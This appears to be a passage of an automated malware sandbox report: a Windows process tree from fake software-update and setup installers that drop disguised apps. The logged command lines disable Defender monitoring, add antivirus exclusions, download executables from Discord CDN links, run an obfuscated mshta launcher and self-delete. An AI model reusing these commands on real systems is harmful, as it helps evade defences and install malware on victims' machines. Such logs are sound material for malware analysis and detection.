                                                                                                    "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --enable-audio-service-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --mojo-platform-channel-handle=1676 /prefetch:8
                                                                                                    5⤵
                                                                                                      PID:10212
                                                                                                    • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                      "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2704 /prefetch:2
                                                                                                      5⤵
                                                                                                        PID:6360
                                                                                                      • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                        "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
                                                                                                        5⤵
                                                                                                          PID:2136
                                                                                                        • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                          "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=2324 /prefetch:2
                                                                                                          5⤵
                                                                                                            PID:8856
                                                                                                          • C:\Users\Admin\AppData\Roaming\Weather\Weather.exe
                                                                                                            "C:\Users\Admin\AppData\Roaming\Weather\Weather.exe" --type=gpu-process --field-trial-handle=1688,11578708602371272631,8421185085121022843,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Weather\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw6628_1838200528" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3396 /prefetch:2
                                                                                                            5⤵
                                                                                                              PID:16132
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_25D5.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Weather\Weather\prerequisites' -retry_count 10"
                                                                                                          3⤵
                                                                                                            PID:5664
                                                                                                        • C:\Windows\syswow64\MsiExec.exe
                                                                                                          C:\Windows\syswow64\MsiExec.exe -Embedding 8D0B1522903E88C526AC7B70E3FE81A1 C
                                                                                                          2⤵
                                                                                                            PID:3824
                                                                                                        • C:\Users\Admin\Desktop\Software-update-patc_988440081.exe
                                                                                                          "C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:1132
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-MPS5N.tmp\Software-update-patc_988440081.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-MPS5N.tmp\Software-update-patc_988440081.tmp" /SL5="$3022E,4479401,466944,C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                            PID:5024
                                                                                                        • C:\Users\Admin\Desktop\Software-update-patc_988440081.exe
                                                                                                          "C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"
                                                                                                          1⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:3684
                                                                                                          • C:\Users\Admin\AppData\Local\Temp\is-JQGGL.tmp\Software-update-patc_988440081.tmp
                                                                                                            "C:\Users\Admin\AppData\Local\Temp\is-JQGGL.tmp\Software-update-patc_988440081.tmp" /SL5="$602B0,4479401,466944,C:\Users\Admin\Desktop\Software-update-patc_988440081.exe"
                                                                                                            2⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Drops file in Program Files directory
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:4196
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
                                                                                                          1⤵
                                                                                                          • Drops file in Windows directory
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:4388
                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                            DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{281517df-404b-4746-8814-625baa710267}\oemvista.inf" "9" "4d14a44ff" "0000000000000168" "WinSta0\Default" "0000000000000170" "208" "c:\program files (x86)\maskvpn\driver\win764"
                                                                                                            2⤵
                                                                                                            • Drops file in System32 directory
                                                                                                            • Drops file in Windows directory
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            PID:912
                                                                                                          • C:\Windows\system32\DrvInst.exe
                                                                                                            DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "0000000000000178"
                                                                                                            2⤵
                                                                                                            • Drops file in Drivers directory
                                                                                                            • Drops file in System32 directory
                                                                                                            • Drops file in Windows directory
                                                                                                            • Checks SCSI registry key(s)
                                                                                                            PID:1192
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
                                                                                                          1⤵
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          PID:2796
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
                                                                                                          1⤵
                                                                                                            PID:3820
                                                                                                          • C:\Program Files (x86)\MaskVPN\mask_svc.exe
                                                                                                            "C:\Program Files (x86)\MaskVPN\mask_svc.exe"
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Loads dropped DLL
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            • Modifies data under HKEY_USERS
                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                            PID:1604
                                                                                                          • C:\Users\Admin\Desktop\Software-update-patc_612604768.exe
                                                                                                            "C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"
                                                                                                            1⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:2120
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-EHPSJ.tmp\Software-update-patc_612604768.tmp
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-EHPSJ.tmp\Software-update-patc_612604768.tmp" /SL5="$8005C,4477466,466944,C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"
                                                                                                              2⤵
                                                                                                              • Executes dropped EXE
                                                                                                              • Loads dropped DLL
                                                                                                              • Drops file in Program Files directory
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              PID:2336
                                                                                                              • C:\Program Files (x86)\Dolore\quia\Quibusdam.exe
                                                                                                                "C:\Program Files (x86)\Dolore/\quia\Quibusdam.exe" 2fe3d428284ff9b385bc1c941892777b
                                                                                                                3⤵
                                                                                                                  PID:4968
                                                                                                            • C:\Users\Admin\Desktop\Software-update-patc_612604768.exe
                                                                                                              "C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"
                                                                                                              1⤵
                                                                                                              • Executes dropped EXE
                                                                                                              PID:5056
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-S8B23.tmp\Software-update-patc_612604768.tmp
                                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-S8B23.tmp\Software-update-patc_612604768.tmp" /SL5="$B015A,4477466,466944,C:\Users\Admin\Desktop\Software-update-patc_612604768.exe"
                                                                                                                2⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Loads dropped DLL
                                                                                                                • Drops file in Program Files directory
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                PID:4336
                                                                                                                • C:\Program Files (x86)\Dolore\quia\Quibusdam.exe
                                                                                                                  "C:\Program Files (x86)\Dolore/\quia\Quibusdam.exe" 2fe3d428284ff9b385bc1c941892777b
                                                                                                                  3⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                  PID:4080
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\NEzcHQw3\D1mhFu3.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\NEzcHQw3\D1mhFu3.exe /qn CAMPAIGN="642"
                                                                                                                    4⤵
                                                                                                                      PID:6632
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\D1npRy0m\ugRrXBaN9Ln.exe /usthree SUB=2fe3d428284ff9b385bc1c941892777b
                                                                                                                      4⤵
                                                                                                                        PID:6616
                                                                                                                • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
                                                                                                                  "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
                                                                                                                  1⤵
                                                                                                                  • Drops file in Windows directory
                                                                                                                  • Modifies registry class
                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                  PID:3552
                                                                                                                • C:\Windows\system32\browser_broker.exe
                                                                                                                  C:\Windows\system32\browser_broker.exe -Embedding
                                                                                                                  1⤵
                                                                                                                    PID:816
                                                                                                                  • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                    "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                    1⤵
                                                                                                                      PID:2312
                                                                                                                    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
                                                                                                                      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
                                                                                                                      1⤵
                                                                                                                        PID:1996
                                                                                                                      • C:\Users\Admin\Desktop\setup_x86_x64_install.exe
                                                                                                                        "C:\Users\Admin\Desktop\setup_x86_x64_install.exe"
                                                                                                                        1⤵
                                                                                                                          PID:1960
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                                                                                            2⤵
                                                                                                                              PID:1544
                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80611967\setup_install.exe
                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\7zS80611967\setup_install.exe"
                                                                                                                                3⤵
                                                                                                                                  PID:4692
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                                                                                                                                    4⤵
                                                                                                                                      PID:992
                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                                                                                                                                        5⤵
                                                                                                                                          PID:4452
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                                                                        4⤵
                                                                                                                                          PID:4480
                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                                                                                                                                            5⤵
                                                                                                                                              PID:2472
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe
                                                                                                                                            4⤵
                                                                                                                                              PID:1060
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu128b511c77e8c.exe
                                                                                                                                                Thu128b511c77e8c.exe
                                                                                                                                                5⤵
                                                                                                                                                  PID:4780
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu128b511c77e8c.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu128b511c77e8c.exe
                                                                                                                                                    6⤵
                                                                                                                                                      PID:5168
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4936
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS80611967\Thu123e05ebe43921.exe
                                                                                                                                                      Thu123e05ebe43921.exe
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4280
                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\3kfj0Nbmsl0rYgrxVLxx3JZG.exe
                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\3kfj0Nbmsl0rYgrxVLxx3JZG.exe"
                                                                                                                                                          6⤵
                                                                                                                                                            PID:5320
                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe
                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe"
                                                                                                                                                            6⤵
                                                                                                                                                              PID:5800
                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe
                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\Zux_SxADRFzQSUmHwDWetZRy.exe"
                                                                                                                                                                7⤵
                                                                                                                                                                  PID:7128
                                                                                                                                                              • C:\Users\Admin\Pictures\Adobe Films\OYP2ihecVJW8nxWNWwhVKaRC.exe
                                                                                                                                                                "C:\Users\Admin\Pictures\Adobe Films\OYP2ihecVJW8nxWNWwhVKaRC.exe"
                                                                                                                                                                6⤵
                                                                                                                                                                  PID:5404
                                                                                                                                                                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                    #cmd
                                                                                                                                                                    7⤵
                                                                                                                                                                      PID:6112
                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\uKDJ0eG25STznzqV4pxyS0ZR.exe
                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\uKDJ0eG25STznzqV4pxyS0ZR.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:4572
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\UsrPEUzowSHUO7MKAtC7TWdY.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\UsrPEUzowSHUO7MKAtC7TWdY.exe"
                                                                                                                                                                      6⤵
                                                                                                                                                                        PID:6044
                                                                                                                                                                        • C:\Windows\system32\cmd.exe
                                                                                                                                                                          "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\B09C.bat "C:\Users\Admin\Pictures\Adobe Films\UsrPEUzowSHUO7MKAtC7TWdY.exe""
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:6544
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:8064
                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe
                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/900686571064414231/900686587866804244/18.exe" "18.exe" "" "" "" "" "" ""
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:5092
                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe
                                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/900686571064414231/900686616924925982/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
                                                                                                                                                                                  8⤵
                                                                                                                                                                                    PID:8324
                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\10532\Transmissibility.exe
                                                                                                                                                                                    Transmissibility.exe
                                                                                                                                                                                    8⤵
                                                                                                                                                                                      PID:9128
                                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe
                                                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\B09A.tmp\B09B.tmp\extd.exe "" "" "" "" "" "" "" "" ""
                                                                                                                                                                                      8⤵
                                                                                                                                                                                        PID:9508
                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe
                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe"
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:5952
                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe
                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\F1zaSM4ruX6Op1wKx8ZRdYlM.exe"
                                                                                                                                                                                        7⤵
                                                                                                                                                                                          PID:8040
                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe
                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe"
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:2204
                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe
                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\LqjWKrAeJ3slveFAm5CEtiqR.exe"
                                                                                                                                                                                            7⤵
                                                                                                                                                                                              PID:1332
                                                                                                                                                                                          • C:\Users\Admin\Pictures\Adobe Films\Q9xi9OxMqIZUmLDloWSzVsRC.exe
                                                                                                                                                                                            "C:\Users\Admin\Pictures\Adobe Films\Q9xi9OxMqIZUmLDloWSzVsRC.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                              PID:6752
                                                                                                                                                                                              • C:\Users\Admin\Documents\PUTgvc0326E9l7mA9sTkorVb.exe
                                                                                                                                                                                                "C:\Users\Admin\Documents\PUTgvc0326E9l7mA9sTkorVb.exe"
                                                                                                                                                                                                7⤵
                                                                                                                                                                                                  PID:8092
                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\ofKeWRq9xNM1UwkmJgnR6Oed.exe
                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\ofKeWRq9xNM1UwkmJgnR6Oed.exe"
                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                      PID:8380
                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\qW0bAoCgF4Wa0qZHb6n8wu12.exe
                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\qW0bAoCgF4Wa0qZHb6n8wu12.exe" /mixtwo
                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                        PID:8708
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "qW0bAoCgF4Wa0qZHb6n8wu12.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\qW0bAoCgF4Wa0qZHb6n8wu12.exe" & exit
                                                                                                                                                                                                          9⤵
                                                                                                                                                                                                            PID:9908
                                                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                              taskkill /im "qW0bAoCgF4Wa0qZHb6n8wu12.exe" /f
                                                                                                                                                                                                              10⤵
                                                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                                                              PID:8328
                                                                                                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\d2mugp___m6TOVo9sbBOygXY.exe
                                                                                                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\d2mugp___m6TOVo9sbBOygXY.exe"
                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                            PID:8860
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                                                              9⤵
                                                                                                                                                                                                                PID:8716
                                                                                                                                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                  taskkill /f /im chrome.exe
                                                                                                                                                                                                                  10⤵
                                                                                                                                                                                                                  • Kills process with taskkill
                                                                                                                                                                                                                  PID:5776
                                                                                                                                                                                                            • C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe
                                                                                                                                                                                                              "C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"
                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                PID:8868
                                                                                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                                                                                                                                                  9⤵
                                                                                                                                                                                                                    PID:5620
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\SkybIUiBuY9Jvjsk3zdQEIhJ.exe" ) do taskkill -f -iM "%~NxM"
                                                                                                                                                                                                                      10⤵
                                                                                                                                                                                                                        PID:9392
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                          taskkill -f -iM "SkybIUiBuY9Jvjsk3zdQEIhJ.exe"
                                                                                                                                                                                                                          11⤵
                                                                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                                                                          PID:10056
                                                                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\T02u0aQkohY8nFGgn8HwY9yl.exe
                                                                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\T02u0aQkohY8nFGgn8HwY9yl.exe"
                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                      PID:8992
                                                                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\uY7wtZLEzOTScfSukKDZWAAv.exe
                                                                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\uY7wtZLEzOTScfSukKDZWAAv.exe"
                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                        PID:8980
                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\ysg2Y3Z2QSbcsVzRtzLe3S4g.exe
                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\ysg2Y3Z2QSbcsVzRtzLe3S4g.exe"
                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                          PID:9136
                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                            9⤵
                                                                                                                                                                                                                              PID:9504
                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                                                                                                10⤵
                                                                                                                                                                                                                                  PID:11000
                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f4,0x1f8,0x1fc,0x1d0,0x200,0x7ffda769dec0,0x7ffda769ded0,0x7ffda769dee0
                                                                                                                                                                                                                                    11⤵
                                                                                                                                                                                                                                      PID:11720
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x180,0x184,0x188,0xbc,0x18c,0x7ff757599e70,0x7ff757599e80,0x7ff757599e90
                                                                                                                                                                                                                                        12⤵
                                                                                                                                                                                                                                          PID:11836
                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
